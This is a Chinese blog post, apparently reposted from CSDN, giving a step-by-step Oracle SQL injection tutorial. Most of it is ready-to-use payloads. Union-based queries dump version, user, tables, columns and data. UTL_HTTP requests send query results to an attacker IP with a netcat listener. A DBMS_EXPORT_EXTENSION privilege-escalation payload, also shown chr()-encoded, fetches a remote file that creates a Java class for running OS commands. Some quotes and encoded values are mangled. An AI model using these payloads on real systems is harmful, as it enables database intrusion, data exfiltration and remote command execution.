oracle注入方法,oracle注入方法

最新推荐文章于 2024-05-14 08:53:38 发布
最新推荐文章于 2024-05-14 08:53:38 发布
阅读量410 收藏 1
点赞数
文章标签: oracle注入方法

①判断是否为Oralce数据库:

And 0<>(select count(*) from dual) 返回正常页面表示为Oracle数据库

②猜解字段数量:

使用order by 或者group by逐个提交数字 直到回显错误页面

③列出字段数目 比如6个字段数目

and  1=1 null,null,null,null,null,null from dual—

因为ORACLE数据库是不自动匹配数据类型的,而null可以匹配任意数据类型,所以这样提交不会报错。 提交它返回了正常页面.

现在来检测当前字段的数据类型,在null的前后加上‘’引号,如果返回正常则说明该字段为字符型,如果返回错误有可能是数字型的,如果不是数字型,那么就是其它类型

例如提交语句: and 1=1 union select null,’null’,null,’null’,null,’null’ from dual–

④读取Oracle数据库版本:

把回显的数字替换成 and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),3,’4′,5,’6′ from dual–

⑤读取Oracle当前数据库连接用户名:

and 1=2 union select 1,(select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual),3,’4′,5,’6′ from dual–

⑥读取当前网站的操作系统的版本:

and 1=2 union select 1,(select member from v$logfile where rownum=1),3,’4′,5,’6′ from dual—

⑦读取表名:

and 1=2 union select 1,TABLE_NAME,3,’4′,5,’6′ from USER_TABLES–

⑧读取表中字段名:

and 1=2 union select 1,COLUMN_NAME,3,’4′,5,’6′ from COLS where TABLE_NAME=’要爆的表名’–

⑨读取表中字段名的数据:

and 1=2 union select 1,NAME,3,’4′,5,’6′ from 字段名–

——————————–

⑩判断UTL_HTTP包是否存在 :

select count(*) from all_objects where object_name=’UTL_HTTP’

利用UTL_HTTP注入 :

在本地用NC监听,使用’and UTL_HTTP.request(‘http://IP:2009/’(查询语句))=1–的形式 . 本地先 nc -l -vv -p 2009,然后提交

‘and UTL_HTTP.request(‘http://IP:2009/’(select banner from sys.v_$version where rownum=1))=1–

‘and UTL_HTTP.request(‘http://ip:2009/’(select owner from all_tables where rownum=1))=1–   爆出第一个库

‘and UTL_HTTP.request(‘http://IP:2009/’(select owner from all_tables where owner<>’第一个库名’ and rownum=1))=1–

‘and UTL_HTTP.request(‘http://IP:2009/’(select owner from all_tables where owner<>’第二个库名’ and owner<>’第一个库名’ and rownum=1))=1–

爆表 :

‘and UTL_HTTP.request(‘http://IP:2009/’(select TABLE_NAME from all_tables where owner=’库名’and rownum=1))=1–

‘and UTL_HTTP.request(‘http://IP:2009/’(select TABLE_NAME from all_tables where owner=’库名’and rownum=1 and TABLE_NAME<>’第一个表名’))=1–

‘and UTL_HTTP.request(‘http://IP:2009/’(select TABLE_NAME from all_tables where owner=’库名’and rownum=1 and TABLE_NAME<>’第一个表名’ and TABLE_NAME<>’第二个表名’))=1–

爆表列:

‘and UTL_HTTP.request(‘http://IP:2009/’(select count(*) from user_tab_columns where table_name=’表名’))=1–   第一个表列名

或者

‘and UTL_HTTP.request(‘http://IP:2009/’(select * from user_tab_columns where table_name=’表名’ and rownum=1))=1–  第一个表列名

‘and UTL_HTTP.request(‘http://IP:2009/’(select * from user_tab_columns where table_name=’表名’ and rownum=1 and COLUMN_NAME<>’第一个爆出的列名’))=1–

爆字段值:

‘and UTL_HTTP.request(‘http://IP:2009/’(select 表段 from 表名 where rownum=1))=1–

‘and UTL_HTTP.request(‘http://IP:2009/’(select 表段 from 表名 where rownum=1 and 表段<>’第一个表段值’))=1–”

利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES函数 获取系统权限 :

‘and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,BAR’,DBMS_OUTPUT”.PUT(1); utl_http.request (‘http://www.xx.com/1.txt’) END;–’,SYS’,0,’1′,0)=0–

假如提交后返回该页无法显示。换成char() 形式后and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(39)chr(70)chr(79),chr(79)chr(39)chr(44),chr(39)chr(66)chr(65)chr(82)chr(39)chr(44)chr(39)chr(68)chr(66)chr(77)chr(883)chr(95)chr(79)chr(85)chr(84)chr(80)chr(85)chr(84)chr(40)chr(58)chr(80)chr(49)chr(41)chr(59)utl_http.request(chr(39)chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(119)chr(119)chr(119)chr(46)chr(108)chr(105)chr(45)chr(116)chr(101)chr(107)chr(46)chr(99)chr(111)chr(109)chr(47)chr(49)chr(46)chr(116)chr(120)chr(116)chr(39))chr(69)chr(78)chr(68)chr(59)chr(45)chr(45)chr(39),chr(39)chr(83)chr(89)chr(83)chr(39),0,chr(39)chr(49)chr(39),0)=0–

远程地址的1.txt内容为 :EXECUTE IMMEDIATE ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ”CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED “JAVACMD” AS import java.lang.*;import java.io.*;public class JAVACMD{public static void execCommand (String command) throws IOException {Runtime.getRuntime().exec(command);}};”;END;’

http://www.dengb.com/oracle/485597.htmlwww.dengb.comtruehttp://www.dengb.com/oracle/485597.htmlTechArticle①判断是否为Oralce数据库: And 0(select count(*) from dual) 返回正常页面表示为Oracle数据库 ②猜解字段数量: 使用order by 或者group by逐个提交数字...

早睡使我成仙
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2141
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
oracle select if判断_关于学习Oracle注入
weixin_39722025的博客
12-06 1816
更多全球网络安全资讯尽在邑安全www.eansec.comOracle注入学习最近学习过程中碰到了有使用oracle数据库的站,但是最后没有拿下来 太菜了ORZ所以学习了一下oracle注入oracle其他的洞还在学习中ing...Oracle数据库Oracle安装先来了解一下oracle数据库:Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文...
Oracle注入
weixin_48141183的博客
11-03 6782
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
干货 | Oracle注入和漏洞利用姿势总结
Javachichi的博客
01-17 2055
Oracle Database,又名 Oracle RDBMS,或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。
2024年Go最新干货 Oracle注入和漏洞利用姿势总结,统统都会
最新发布
qq_38197819的博客
05-14 444
Oracle 8i 开始,Oracle Database 允许在数据库中存储和执行 Java,并提供了 Java 池,用于存放 Java 代码、Java 语句的语法分析表、Java 语句的执行方案和 Java 虚拟机中的数据,以便进行 Java 程序开发。在实际利用中,如果我们获取了 Oracle 管理员级别的用户凭据,可以通过 DBMS_SCHEDULER 包中存储过程创建程序/作业对象,来调度操作系统的可执行文件或脚本,从而执行系统命令。此外,还需要数据库服务器可以出网。
Oracle数据库注入
weixin_50464560的博客
08-06 1517
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
Oracle注入(基础篇)
zkaqlaoniao的博客
11-03 765
上面我们已经知道了是4个字段,然后就可以先写上4个null进行占位union select null,null,null,null from dual,然后逐个替换数据的类型进行测试,常见的数据类型其实就那么几个(数值,字符串,时间)在Oracle中有一个比较特殊的存在,它就是rownum,它是一个伪列,它并不存储在任何表中,而是在当我们执行了查询语句之后,它就会出现,对查出来的数据进行编号,将它做为一个判断规则时,它是不支持用>号的,只能是=1或者
JSP+ORACLE注入方法
06-30
**JSP+Oracle注入方法详解** 在Web应用程序开发中,JSP(JavaServer Pages)与Oracle数据库的结合是常见的技术组合。然而,由于不恰当的编程实践,这种结合可能导致安全问题,尤其是SQL注入攻击。SQL注入是一种利用...
oracle注入utl_http方法.doc
07-18
Oracle 注入 utl_http 方法 Oracle 注入 utl_http 方法是指攻击者使用 Oracle 数据库的 UTL_HTTP 包来实现注入攻击的方法。UTL_HTTP 是 Oracle 提供的一个包,用于通过 HTTP 协议从远程服务器获取数据。攻击者可以...
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
oracle注入绕狗1
08-03
oracle注入绕狗1
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
CnsaferSI (JSP+oracle注入工具)
09-02
使用比较广泛的JSP+oracle注入工具
ORACLE数据库手工注入详解.doc
04-08
ORACLE数据库手工注入详解
Oracle注入-案例分析
hackzkaq的博客
11-28 218
今天这篇SQL注入的专题给到我们的Oracle数据库,它是甲骨文公司的一款关系数据库管理系统,其中在市面上的使用率也是很高的。因此这里有必要学习一下关于它的SQL注入的一些注意事项。我会在本篇文章中提到Oracle注入的注意点和其中的排序注入与绕过。
19、注入篇--报错注入Oracle
WX公众号-小白学安全
04-10 718
Oracle概述 1、Oracle数据库属于甲骨文公司,关系型数据库管理系统,数据库 2、讲究语法严谨 select 字段名 from 表名 3、dual表—>虚表 专门用于满足数据库语句结构的表 大部分数据库是数据敏感大小写,语句是不敏感大小写 4、Oracle系统自带表: 没有库的概念,只有用户的概念 查询出所有的表: select from all_tables 查询用户所创建的表:select from user_tables 查询所有的字段:select from all_tab_colum
order by注入与limit注入
lml_0916的博客
08-08 1721
在数据库中,order by的作用是对数据表中查询的数据进行排序的方式。正常情况下我们去查询一个数据库的时候,它显示的顺序可能是根据插入的数据来进行排序的,所以可以通过order by进行排序,方便查看select * from 表名 order by 列名(数字) asc;(升序的) select * from 表名 order by 列名(数字) desc;(降序的)举个例子:正常情况下,用户表的排名是这样的当我们使用命令。...
oracle注入报错500
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值